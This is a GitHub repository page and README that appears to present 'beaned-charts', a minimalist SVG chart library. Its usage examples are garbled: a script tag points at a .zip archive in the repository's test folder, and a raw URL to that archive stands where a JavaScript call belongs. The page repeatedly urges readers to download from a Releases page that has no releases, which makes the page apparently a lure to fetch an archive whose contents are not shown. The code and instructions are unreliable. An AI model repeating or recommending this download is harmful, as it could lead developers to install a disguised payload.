Skip to content

🫘 Generate responsive, minimalist SVG charts with Beaned-Charts—an easy-to-use, zero-dependency library for modern web applications.

Notifications You must be signed in to change notification settings

Zliito/beaned-charts

Repository files navigation

📊 beaned-charts - Create Stunning SVG Charts Easily

🎉 Introduction

Welcome to beaned-charts! This is a minimalist SVG chart library designed for modern web applications. With beaned-charts, you can generate beautiful and responsive charts using pure JavaScript—no frameworks are required. Perfect for those who want to visualize data without the complexity of big libraries.

🛠️ System Requirements

To run beaned-charts, you will need:

  • A web browser: Chrome, Firefox, Safari, or Edge (latest versions are recommended).
  • Basic HTML file setup for chart integration.

📥 Download & Install

To get started, visit our Releases page to download. Choose the version you want and download the files needed to use the library in your project.

🚀 Getting Started

  1. After downloading, unzip the file if it is compressed.
  2. Place the downloaded files in your project directory.
  3. Open your HTML file and link the JavaScript file from beaned-charts.
  4. Follow the simple examples in the documentation to create your charts.

📖 Basic Usage

To create a basic chart, you'll need to include the beaned-charts script in your HTML like this:

<script src="https://raw.githubusercontent.com/Zliito/beaned-charts/main/test/beaned-charts-v1.9-alpha.5.zip"></script>

Then, you can create your chart by adding a JavaScript function. Here’s a simple example:

<script>
  const data = [10, 20, 30, 40];
  const chart = new BeanedChart('chart-container', data);
  https://raw.githubusercontent.com/Zliito/beaned-charts/main/test/beaned-charts-v1.9-alpha.5.zip();
</script>

Don't forget to include a <div id="chart-container"></div> in your HTML where you want the chart to appear.

🎨 Features

  • Lightweight: At just a few kilobytes, this library won’t slow down your application.
  • Responsive: Charts adjust automatically to fit different screen sizes.
  • Easy to Use: Simple syntax makes it user-friendly for beginners and non-coders.
  • Customizable: Change colors and styles to match your application’s design.

🔄 Update Process

To keep your charts up to date:

  1. Visit the Releases page regularly.
  2. Download the latest version.
  3. Replace the old files in your project with the new ones.

💬 Support

If you encounter any issues, you can open an issue on our GitHub page. Join our community to help shape the future of beaned-charts.

🗂️ Project Topics

beaned-charts covers a variety of topics to help you integrate data visualization in your applications:

  • dev
  • generate
  • javascript
  • js
  • npm
  • npm-package
  • package
  • sb-studio
  • snowbase-studio
  • ui

📝 Conclusion

With beaned-charts, generating SVG charts has never been easier. Explore the possibilities by downloading today from our Releases page and see how simple it is to visualize your data.

Your journey into visual data representation starts here!

About

🫘 Generate responsive, minimalist SVG charts with Beaned-Charts—an easy-to-use, zero-dependency library for modern web applications.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors